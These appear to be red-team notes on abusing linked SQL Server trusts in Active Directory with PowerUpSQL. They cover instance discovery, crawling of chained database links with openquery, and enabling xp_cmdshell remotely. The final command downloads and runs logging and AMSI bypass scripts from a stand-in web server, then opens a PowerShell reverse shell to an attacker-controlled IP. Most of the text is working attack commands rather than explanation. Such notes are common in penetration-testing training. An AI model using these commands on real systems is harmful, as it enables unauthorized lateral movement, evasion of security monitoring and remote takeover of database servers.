Active Directory Resource

Trust Abuse

2 min read

SQL Servers

Import-Module C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.ps1
. C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.ps1
Get-SQLInstanceDomain
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
  • A database link allows SQL Server to access external data sources like other SQL servers and OLE DB data sources.
  • In case of database links between SQL servers, that is, linked SQL servers, it is possible to execute stored procedures.
  • Database links work even across forest trusts.
Get-SQLServerLink -Instance sql-machine -Verbose
select * from master..sysservers
  • Openquery() function can be used to run queries on a linked database
select * from openquery("sql-machine", 'select * from master..sysservers')
Get-SQLServerLinkCrawl -Instance sql-machine -Verbose
select * from openquery("sql-machine", 'select * from openquery("sql-machine-next", "select * from master..sysservers")')

Executing Commands

  • On the target server, either xp_cmdshell should be already enabled; or
  • If rpcout is enabled (disabled by default), xp_cmdshell can be enabled using:
EXECUTE('sp_configure "xp_cmdshell",1;reconfigure;') AT "sql-machine"

Use the -QueryTarget parameter to run Query on a specific instance (without -QuertyTarget the command tries to use xp_cmdshell on every link of the chain)

Get-SQLServerLinkCrawl -Instance sql-machine-starting -Query "exec master..xp_cmdshell 'whoami'" -QueryTarget sql-machine
select * from openquery("sql-machine",'select * from openquery("sql-machine-next","select * from openquery("outer-sql-machine", ""select @@version as version;exec master..xp_cmdshell "powershell whoami)"")")')
Get-SQLServerLinkCrawl -Instance first-instance -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://your.webserver/sbloggingbypass.txt);iex(iwr -UseBasicParsing http://your.webserver/amsibypass);iex (iwr -UseBasicParsing http://your.webserver/Invoke-PowershellTcp.ps1);Power -Reverse -IPAddress foothold.ip -Port listening.port"''' -QueryTarget last.node

Graph View